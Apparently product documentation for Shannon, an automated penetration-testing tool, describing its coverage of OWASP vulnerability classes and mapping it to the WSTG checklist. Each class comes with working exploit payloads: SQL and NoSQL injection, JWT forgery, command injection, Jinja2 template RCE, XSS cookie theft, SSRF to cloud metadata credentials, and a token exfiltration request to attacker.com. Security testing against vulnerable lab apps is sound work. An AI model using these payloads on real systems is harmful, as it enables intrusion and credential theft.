Skip to main content
Shannon targets five major vulnerability classes based on the OWASP Top 10 and OWASP API Security Top 10. Every vulnerability must be successfully exploited with a working proof-of-concept to be included in reports.

Covered vulnerability classes

Broken authentication

Authentication vulnerabilities allow attackers to bypass or compromise user authentication mechanisms.
Description: Direct SQL injection in login forms enabling authentication without valid credentialsDetection: Shannon analyzes login endpoints for string interpolation in SQL queriesExploitation:
curl -X POST /api/login \
  -d '{"email":"admin'\''--","password":"irrelevant"}'
Impact: Complete authentication bypass, admin accessExample: Juice Shop INJ-VULN-01
Description: JWT libraries accepting symmetric algorithm (HS256) when configured for asymmetric (RS256)Detection: Shannon tests JWT validation by signing tokens with the public key using HMACExploitation:
import jwt
forged = jwt.encode({'user': 'admin'}, public_key, algorithm='HS256')
Impact: Authentication bypass, privilege escalationExample: crAPI AUTH-VULN-01
Description: JWT validation accepting unsigned tokens with algorithm set to “none”Detection: Shannon submits tokens with alg:none header and no signatureExploitation:
TOKEN=$(echo '{"alg":"none"}' | base64).\
$(echo '{"user":"admin"}' | base64).
Impact: Universal authentication bypassExample: crAPI AUTH-VULN-02
Description: No password complexity requirements or account lockoutDetection: Shannon attempts registration with weak passwords and brute force attacksImpact: Account compromise via brute force
Description: Systems with unchanged default usernames and passwordsDetection: Shannon tests common default credentials (admin/admin, root/root, etc.)Impact: Immediate administrative access

Broken authorization

Authorization vulnerabilities allow attackers to access resources or perform actions beyond their privileges.
Description: Predictable object identifiers without ownership validationDetection: Shannon enumerates IDs and tests access across user contextsExploitation:
# Regular user accessing user ID 1 (admin)
curl -H "Authorization: Bearer $USER_TOKEN" \
  http://app.com/api/users/1
Impact: Horizontal privilege escalation, data disclosureExample: Juice Shop AUTHZ-VULN-03, crAPI AUTHZ-VULN-01
Description: Unfiltered input allowing modification of privileged object fieldsDetection: Shannon includes privileged fields (role, admin, permissions) in update requestsExploitation:
curl -X PUT /api/profile \
  -d '{"email":"[email protected]","role":"admin"}'
Impact: Privilege escalation from regular user to adminExample: ctal AUTHZ-VULN-01, Juice Shop AUTHZ-VULN-01
Description: Admin endpoints accessible to regular users due to missing role checksDetection: Shannon tests admin endpoints with regular user tokensImpact: Administrative functionality abuseExample: crAPI AUTHZ-VULN-04
Description: Path manipulation enabling access to files outside intended directoryDetection: Shannon tests file parameters with ../ sequencesExploitation:
curl http://app.com/download?file=../../../../etc/passwd
Impact: Arbitrary file read, configuration disclosure

Injection attacks

Injection vulnerabilities occur when untrusted data is sent to an interpreter as part of a command or query.
Description: SQL injection enabling data extraction via UNION SELECTDetection: Shannon tests for SQL errors, then extracts data using UNION queriesExploitation:
curl "http://app.com/search?q=x'%20UNION%20SELECT%20username,password%20FROM%20users--"
Impact: Complete database compromise, credential theftExample: Juice Shop INJ-VULN-02, crAPI INJ-VULN-01
Description: Blind SQL injection using time delays to infer dataDetection: Shannon injects sleep() commands and measures response timesExploitation:
# PostgreSQL
curl "http://app.com/api/product/123'%20AND%20pg_sleep(5)--"

# MySQL
curl "http://app.com/api/product/123'%20AND%20sleep(5)--"
Impact: Data exfiltration via boolean queriesExample: crAPI INJ-VULN-02
Description: NoSQL operator injection in MongoDB queriesDetection: Shannon injects MongoDB operators (ne,ne, gt, $regex)Exploitation:
{"username": {"$ne": null}, "password": {"$ne": null}}
Impact: Authentication bypass, data extractionExample: Juice Shop INJ-VULN-04
Description: OS command execution via unsanitized user inputDetection: Shannon injects shell metacharacters and tests for command executionExploitation:
curl -X POST /api/debug/exec \
  -d '{"command":"ls;cat /etc/passwd"}'
Impact: Complete server compromise, RCEExample: ctal INJ-VULN-01 (root-level execution)
Description: Template engine code execution via user-controlled templatesDetection: Shannon tests template expressions ({{7*7}}, ${7*7}) and checks for evaluationExploitation:
# Jinja2
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

# Handlebars
{{#with "s" as |string|}}
  {{#with "e"}}
    {{lookup string.sub "constructor"}}
  {{/with}}
{{/with}}
Impact: Remote code execution

Cross-site scripting (XSS)

XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users.
Description: User input immediately reflected in HTTP response without sanitizationDetection: Shannon injects XSS payloads into parameters and checks for executionExploitation:
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<iframe src="javascript:alert('XSS')">
Impact: Session hijacking, credential theft, defacementExample: Juice Shop XSS-VULN-01
Description: Malicious script stored in database and executed when viewed by usersDetection: Shannon submits XSS payloads via forms and checks rendering contextsImpact: Persistent XSS affecting all users, worm potential
Description: Client-side script execution via unsafe JavaScript sinksDetection: Shannon analyzes JavaScript code for unsafe sinks (innerHTML, eval, document.write)Exploitation:
// Payload in URL fragment
http://app.com/#<img src=x onerror=alert(1)>
Impact: Client-side code execution
Description: Bypassing framework sanitization via encoding or polyglot payloadsDetection: Shannon tests framework-specific bypass techniquesExploitation:
<!-- Angular -->
<iframe src="javascript:alert(1)">

<!-- React -->
<a href="javascript:alert(1)">Click</a>
Impact: XSS in supposedly safe frameworksExample: Juice Shop XSS-VULN-01 (Angular bypass)

Server-side request forgery (SSRF)

SSRF vulnerabilities allow attackers to make requests from the server to internal or external systems.
Description: SSRF enabling access to internal services not exposed to internetDetection: Shannon tests URL parameters with internal IPs and localhostExploitation:
# Access Redis
curl -X POST /api/fetch \
  -d '{"url":"http://localhost:6379"}'

# Access internal admin panel
curl -X POST /api/fetch \
  -d '{"url":"http://internal-admin:8080/admin"}'
Impact: Internal network access, service enumerationExample: Juice Shop SSRF-VULN-01
Description: SSRF accessing cloud provider instance metadataDetection: Shannon tests metadata endpoints for AWS, GCP, AzureExploitation:
# AWS
curl -X POST /api/share/report \
  -d '{"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'

# GCP
curl -X POST /api/share/report \
  -d '{"url":"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"}'
Impact: IAM credential theft, cloud account compromiseExample: crAPI SSRF-VULN-01
Description: SSRF automatically forwarding user’s authentication headersDetection: Shannon tests if Authorization headers are forwarded to attacker-controlled serversExploitation:
# Exfiltrate JWT to attacker server
curl -X POST /api/share/report \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"url":"http://attacker.com/collect"}'
Impact: Credential exfiltration, token theftExample: crAPI SSRF-VULN-01 (critical)
Description: SSRF using non-HTTP protocols for file read or protocol smugglingDetection: Shannon tests file:// for local file access and gopher:// for protocol smugglingExploitation:
# File protocol
curl -X POST /api/fetch \
  -d '{"url":"file:///etc/passwd"}'

# Gopher protocol (Redis exploitation)
curl -X POST /api/fetch \
  -d '{"url":"gopher://localhost:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a"}'
Impact: File read, service exploitation

WSTG checklist

Shannon’s coverage mapped to the OWASP Web Security Testing Guide (WSTG) v4.2:
Test IDTest NameStatus
WSTG-INFO-02Fingerprint web server
WSTG-INFO-06Identify application entry points
WSTG-INFO-07Map execution paths through application
WSTG-INFO-08Fingerprint web application framework
WSTG-INFO-09Fingerprint web application
WSTG-INFO-10Map application architecture
WSTG-CONF-01Test network infrastructure configuration
WSTG-CONF-10Test for subdomain takeover
Test IDTest NameStatus
WSTG-ATHN-01Credentials transported over encrypted channel
WSTG-ATHN-02Testing for default credentials
WSTG-ATHN-03Testing for weak lock out mechanism
WSTG-ATHN-04Testing for bypassing authentication schema
WSTG-ATHN-07Testing for weak password policy
WSTG-ATHN-08Testing for weak security question/answer
WSTG-ATHN-09Testing for weak password change/reset
WSTG-ATHN-10Testing for weaker authentication in alternative channel
WSTG-ATHN-11Testing multi-factor authentication (MFA)
Test IDTest NameStatus
WSTG-ATHZ-01Testing directory traversal/file include
WSTG-ATHZ-02Testing for bypassing authorization schema
WSTG-ATHZ-03Testing for privilege escalation
WSTG-ATHZ-04Testing for insecure direct object references
WSTG-ATHZ-05Testing for OAuth weaknesses
Test IDTest NameStatus
WSTG-SESS-01Testing for session management schema
WSTG-SESS-02Testing for cookies attributes
WSTG-SESS-03Testing for session fixation
WSTG-SESS-05Testing for Cross Site Request Forgery
WSTG-SESS-06Testing for logout functionality
WSTG-SESS-07Testing session timeout
WSTG-SESS-10Testing JSON Web Tokens
WSTG-SESS-11Testing for concurrent sessions
Test IDTest NameStatus
WSTG-INPV-01Testing for reflected cross site scripting
WSTG-INPV-02Testing for stored cross site scripting
WSTG-INPV-05Testing for SQL injection
WSTG-INPV-11Testing for code injection
WSTG-INPV-12Testing for command injection
WSTG-INPV-18Testing for server-side template injection
WSTG-INPV-19Testing for server-side request forgery
WSTG-CLNT-01Testing for DOM based cross site scripting
WSTG-CLNT-02Testing for JavaScript execution
WSTG-CLNT-03Testing for HTML injection
Test IDTest NameStatus
WSTG-APIT-01API reconnaissance
WSTG-APIT-02API broken object level authorization
WSTG-APIT-99Testing GraphQL
For the complete WSTG checklist with all 159 controls, see the COVERAGE.md file in the Shannon repository.

Coverage overview

High-level overview of Shannon’s testing philosophy and coverage

Benchmark results

96.15% success rate on XBOW benchmark

Sample reports

Real penetration testing results from vulnerable applications

Run your first test

Get started with Shannon in under 10 minutes

Build docs developers (and LLMs) love

Get started for freeTalk to us